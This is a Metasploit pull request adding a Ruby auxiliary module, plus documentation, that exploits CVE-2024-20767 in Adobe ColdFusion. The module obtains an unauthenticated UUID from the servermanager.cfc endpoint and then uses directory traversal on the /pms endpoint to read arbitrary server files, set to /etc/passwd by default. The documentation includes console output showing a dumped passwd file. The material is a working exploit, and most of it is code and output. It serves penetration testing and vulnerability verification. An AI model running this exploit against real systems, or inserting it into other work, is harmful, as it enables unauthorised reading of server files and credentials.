Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adobe ColdFusion Arbitrary File Read [CVE-2024-20767] #19050

Merged
5 commits merged into from
May 3, 2024
Merged

Adobe ColdFusion Arbitrary File Read [CVE-2024-20767] #19050

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
5 commits
Select commit Hold shift + click to select a range
b55c5f4
Initial commit
jheysel-r7 Apr 4, 2024
9a88ca3
second commit with a couple TODOs
jheysel-r7 Apr 4, 2024
bf240b7
Responded to comments
jheysel-r7 Apr 26, 2024
c0e589d
Updated single quotes
jheysel-r7 Apr 26, 2024
e3d7dce
Updated res.body parsing, responded to comments
jheysel-r7 May 2, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
59 changes: 59 additions & 0 deletions documentation/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
## Vulnerable Application
This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
'2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.

### Setup

#TODO: Find out how to setup a vulnerable target and put those details here.

## Verification Steps

1. Start msfconsole
1. Do: `use coldfusion_pms_servlet_file_read`
1. Set the `RHOST` and datastore option
1. If the target host is running Windows, change the default `FILE_PATH` datastore options from `/tmp/passwd` to a file path that exists on Windows.
1. Run the module
1. Receive the contents of the `FILE_PATH` file

## Scenarios
### ColdFusion Version 2023.0.0.330468 running on Linux

```
msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > run
[*] Reloading module...
[*] Running module against 127.0.0.1

[*] Attempting to retrieve UUID ...
[+] UUID found: 1c49c29a-f1c0-4ed0-9f9e-215f434c8a12
[*] Attempting to exploit directory traversal to read /etc/passwd
[+] File content:
n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash
hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false
pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
whoopsie:x:117:124::/nonexistent:/bin/false
cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin
uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
games:x:5:60:games:/usr/games:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

[+] Results saved to: /Users/jheysel/.msf4/loot/20240403192500_default_127.0.0.1_coldfusion.file_475871.txt
[*] Auxiliary module execution completed
```
111 changes: 111 additions & 0 deletions modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,111 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read',
'Description' => %q{
This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
'2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
},
'Author' => [
'ma4ter', # Analysis & Discovery
'yoryio', # PoC
'Christiaan Beek', # Msf module
'jheysel-r7' # Msf module assistance
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-20767'],
['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html'],
['URL', 'https://jeva.cc/2973.html'],

],
'DisclosureDate' => '2024-03-12',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options(
[
Opt::RPORT(8500),
OptString.new('TARGETURI', [true, 'The base path for ColdFusion', '/']),
OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000]),
OptInt.new('DEPTH', [true, 'Traversal Depth', 5]),
]
)
end

def get_uuid
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', '_servermanager', 'servermanager.cfc'),
'vars_get' =>
{
'method' => 'getHeartBeat'
}
})
fail_with(Failure::Unreachable, 'No response from the target when attempting to retrieve the UUID') unless res

# TODO: give a more detailed error message once we find out why some of the seemingly vulnerable test targets return a 500 here.
fail_with(Failure::UnexpectedReply, "Received an unexpected response code: #{res.code} when attempting to retrieve the UUID") unless res.code == 200
uuid = res.get_html_document.xpath('//var[@name=\'uuid\']/string/text()').text
fail_with(Failure::UnexpectedReply, 'There was no UUID in the response') unless uuid =~ /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/
uuid
end

def run
print_status('Attempting to retrieve UUID ...')
uuid = get_uuid
print_good("UUID found: #{uuid}")
print_status("Attempting to exploit directory traversal to read #{datastore['FILE_PATH']}")

traversal_path = '../' * datastore['DEPTH']
file_path = "#{traversal_path}#{datastore['FILE_PATH']}"

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'pms'),
'vars_get' =>
{
'module' => 'logging',
'file_name' => file_path,
'number_of_lines' => datastore['NUMBER_OF_LINES']
},
'headers' =>
{
'uuid' => uuid
}
})

fail_with(Failure::Unknown, 'No response received') unless res

if res.code == 200
print_good('File content received:')
else
fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")
end

file_contents = []
res.body[1..-2].split(', ').each do |html_response_line|
print_status(html_response_line)
file_contents << html_response_line
end

stored_path = store_loot('coldfusion.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])
print_good("Results saved to: #{stored_path}")
end
end
Loading